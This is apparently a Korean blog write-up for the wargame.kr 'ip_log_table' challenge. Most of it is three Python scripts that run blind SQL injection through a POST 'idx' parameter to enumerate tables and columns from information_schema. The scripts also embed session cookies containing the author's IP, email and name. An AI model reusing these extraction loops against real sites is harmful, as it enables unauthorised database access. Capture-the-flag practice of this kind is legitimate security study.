wargame.kr ip_log_table 풀이

2017. 2. 23. 20:42

post로 넘어가는 값에서 인젝션이 먹힌다.

일단 소스

# -*- coding: utf-8 -*-
#테이블 수
import urllib, urllib2,sys

url = "http://wargame.kr:8080/ip_log_table/chk.php"
user_agent= "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729"
PHPSESSID = "iobpqpqjlpam4boq5fv0vidpl0"

for i in range(50):
    dat = {'idx': "17038 and if((select count(table_name) from information_schema.tables)="+str(i)+",17038,0)"}
    dat = urllib.urlencode(dat)
    req = urllib2.Request(url,dat)
    req.add_header("User-agent", user_agent)
    req.add_header('Cookie', "PHPSESSID="+PHPSESSID+"; "
                + "ci_session="+"a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a7095fb884baece73aeac4455d091c1e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487849256%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1487848366%3B%7D07e7b2991c534171d406dbbeeb95548fd72b86b8")
    res = urllib2.urlopen(req).read()

    if "2017-02-23 19:47:27" in res:
        print "[*]Find tables count! : " + str(i)
        break
        sys.exit(1)

# -*- coding: utf-8 -*-
#테이블명
import urllib, urllib2,sys

url = "http://wargame.kr:8080/ip_log_table/chk.php"
user_agent= "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729"
PHPSESSID = "iobpqpqjlpam4boq5fv0vidpl0"

n = 40
while n < 43:
    flag = ""
    for i in range(40):
        for j in range(36,90):
            dat = {'idx': "17038 and if(substring((select table_name from information_schema.tables limit "+str(n)+",1),"+str(i)+",1)="+"0x"+hex(j)[2:]+",17038,0)"}
            dat = urllib.urlencode(dat)
            req = urllib2.Request(url,dat)
            req.add_header("User-agent", user_agent)
            req.add_header('Cookie', "PHPSESSID="+PHPSESSID+"; "
                        + "ci_session="+"a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a7095fb884baece73aeac4455d091c1e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487849256%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1487848366%3B%7D07e7b2991c534171d406dbbeeb95548fd72b86b8")
            res = urllib2.urlopen(req).read()

            if "2017-02-23 19:47:27" in res:
                flag += chr(j)
                print "[+]Find! : " + chr(j)
                break
                sys.exit(1)
    print "[*]Find flag! : " + flag
    n += 1

#칼럼명
import urllib, urllib2

url = "http://wargame.kr:8080/ip_log_table/chk.php"
user_agent= "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729"
PHPSESSID = "iobpqpqjlpam4boq5fv0vidpl0"

dat = {'idx': "17053  and if((select count(column_name) from information_schema.columns)=486,17053,0)"}
dat = urllib.urlencode(dat)
req = urllib2.Request(url,dat)
req.add_header("User-agent", user_agent)
req.add_header('Cookie', "PHPSESSID="+PHPSESSID+"; "
                + "ci_session="+"a%3A10%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229c4639bdd4c2b4e5fdd6c246f1e79011%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487934026%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3B%7Dba943cf039368323def355883b41fbefa82da0c6")
res = urllib2.urlopen(req).read()
print res

'Wargame > wargame.kr' 카테고리의 다른 글

wargame.kr adm1nkyj (0)	2017.02.26
wargame.kr fly me to the moon (0)	2017.02.24
wargame.kr simple board (0)	2017.02.19
wargame.kr dmbs335 700p (0)	2016.10.04
wargame.kr web_chatting 650p (0)	2016.10.04

SSo

wargame.kr ip_log_table 풀이

'Wargame > wargame.kr' 카테고리의 다른 글

+ Recent posts

티스토리툴바